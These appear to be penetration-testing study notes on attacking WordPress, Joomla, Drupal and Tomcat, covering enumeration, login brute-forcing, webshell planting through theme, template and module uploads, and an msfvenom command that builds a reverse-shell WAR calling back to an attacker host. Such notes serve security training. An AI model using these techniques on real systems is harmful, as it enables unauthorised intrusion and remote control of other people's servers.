Attacking Common Applications (Check)

During engagements, you'll often encounter popular web applications that can provide valuable entry points or insights into the target environment.

Discovery

• nmap: Use nmap to scan for common web ports and gather initial data about the services running on a target host.

• After scanning with nmap, tools like EyeWitness and Aquatone can process the results to create detailed reports with screenshots of each discovered web page.

Content Management Systems (CMS)

• CMS platforms are widely used and can be a rich target for enumeration and exploitation. Below, we detail approaches for attacking WordPress, Joomla, and Drupal.

WordPress

Identification & Enumeration:

• Recognizing a WordPress Site:

  • Check the /robots.txt file; it may include entries like Disallow: /wp-admin/

  • View the page source for meta tags such as:

    <meta name="generator" content="WordPress 5.8" />

• Key Information to Gather:

  • WordPress version

  • Installed themes and plugins (look for readme.txt files in /wp-content/plugins/<Plugin-Name>/)

  • Published user names (e.g., via author archives or meta tags)

  • Files in /wp-content/uploads/

Attacking WordPress:

• WPScan:

  • WPScan is an automated WordPress enumeration tool. It can scan for outdated themes, plugins, and known vulnerabilities.

  • It can be used to:

    • Enumerate users, plugins, and themes

    • Perform vulnerability assessments by integrating with WPVulnDB via an API token

    • Example Command to Enumerate Plugins:

      wpscan --url <Target> --enumerate p --api-token <API-Token>

• Login Bruteforce:

  • WPScan supports brute-forcing using either the standard wp-login page or the faster /xmlrpc.php endpoint.

  • Both types of attack can be automated using wpscan.

• Code Execution via Theme Editor:

  • With administrative access, you can modify PHP files via the Theme Editor which can be used to deploy a webshell (found in /wp-content/themes/<Theme-Name>).

  • Exploitation Steps:

    • Login to the wp-admin page.

    • Access the Theme editor.

    • Find a php page.

    • Edit the page to add a webshell.

    • Access the page using: /wp-content/themes/<Theme-Name>

• Exploiting Vulnerable Plugins:

  • Always check for the installed plugins, there is a chance that some of them might be vulnerable.

Joomla

Identification & Enumeration:

• Recognizing a Joomla Site:

  • Check /robots.txt for directory hints (e.g., references to /joomla/)

  • Look in the page source for meta tags such as:

    <meta name="generator" content="Joomla! - Open Source Content Management" />

  • Files like README.txt or administrator manifests can provide version details.

• Tools for Enumeration:

  • droopescan and JoomlaScan can help enumerate Joomla-specific configurations and vulnerabilities.

  • joomla-bruteforce can be used to perform login brute-forcing.

Attacking Joomla:

• Login Bruteforce:

  • Use tools like joomla-bruteforce to test common credentials against the Joomla login page.

• Code Execution via Template Editing:

  • With administrative access, you can modify PHP files via the Template Editor which can be used to deploy a webshell.

  • Exploitation Steps:

    • Login to the admin panel.

    • Access the template editor.

    • Find a php page.

    • Edit the page to add a webshell.

    • Access the page using: /templates/<Page-Name>

• Vulnerable Versions:

  • Always verify if the target Joomla version is outdated or known to be vulnerable to specific exploits.

Drupal

Identification & Enumeration:

• Recognizing a Drupal Site:

  • Look for clues in the header or footer such as “Powered by Drupal”

  • Check for the presence of files like CHANGELOG.txt, README.txt, or a typical Drupal logo

  • Notice URIs of the form /node/<nodeid> which indicate content indexing by Drupal

• Tools for Enumeration:

  • droopescan can be used to enumerate Drupal sites and gather version information.

Attacking Drupal:

• PHP Filter Module Exploitation (Pre-Drupal 8):

  • In older Drupal versions, an admin might enable the PHP filter module, which allows the insertion of PHP code into pages. Leading to the chance of executing arbitrary PHP code on the server.

• Uploading a Malicious Module:

  • Drupal allows the upload of new modules. By creating a backdoored module, you can inject a web shell.

  • Modules can be found in Drupal website.

  • Download the archive and extract its contents.

  • Create a PHP web shell with the payload contents.

  • Ensure to add a .htaccess file to gain access to the module folder. (The configuration below will apply rules for the / folder when we request a file in /modules.)

  • Copy both of these files to the module folder and create an archive of the module.

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

• Vulnerable Versions:

  • Always verify if the target Drupal version is outdated or known to be vulnerable to specific exploits (e.g. Drupalgeddon)

Servlet Containers/Software Development

Tomcat

Identification & Enumeration:

• Check the Server header in responses (or on 404/500 pages) for “Apache” or “Coyote.”

• Probe the /manager/html and /host-manager/html endpoints for HTTP Basic auth prompts.

Important Directories & Files:

• bin: Scripts and binaries needed to start and manage Tomcat (startup.sh, catalina.bat, etc.).

• conf: Configuration files; notably tomcat-users.xml which stores user credentials and roles.

• lib: JAR files required by Tomcat and deployed applications.

• logs, temp: Runtime logs and temporary files.

• webapps: Default webroot hosting all deployed applications (auto‑exploded WARs).

• work: Runtime cache for compiled JSPs and servlet data.

• WEB‑INF/web.xml (Deployment Descriptor): Defines servlet mappings, filters, listeners, and other route/configuration metadata.

• WEB‑INF/classes: Compiled .class files containing application logic—potentially rich in sensitive business code.

Attacking Tomcat

• Manager Brute‑Force:

  • Use Metasploit’s auxiliary/scanner/http/tomcat_mgr_login module to brute‑force credentials against /manager/html and /host-manager/html.

  • Alternatively, custom Python scripts can loop common creds, Base64‑encode "username:password", and inject into an Authorization: Basic … header.

• Deploying a Malicious WAR:

  • With valid manager credentials you can upload a WAR file containing a JSP web shell.

  • Using zip:

    zip shell.war shell.jsp

    Place your shell.jsp in the root of the archive, then upload via the Tomcat Manager interface, Tomcat will auto‑extract and deploy.

• msfvenom:

  msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your‑IP> LPORT=<Your‑Port> -f war -o reverse.war

• Upload reverse.war manually or automate with Metasploit’s multi/http/tomcat_mgr_upload module for rapid compromise.

• Vulnerabilities & CVEs:

  • Ghostcat (CVE‑2020‑1938): An unauthenticated file‐read and LFI via the AJP connector—can disclose WEB‑INF/web.xml, tomcat-users.xml, or any files accessible to the Tomcat process.

  • Always consult public CVE databases (e.g., NIST NVD, Exploit‑DB) or run searchsploit tomcat to discover additional version‑specific vulnerabilities.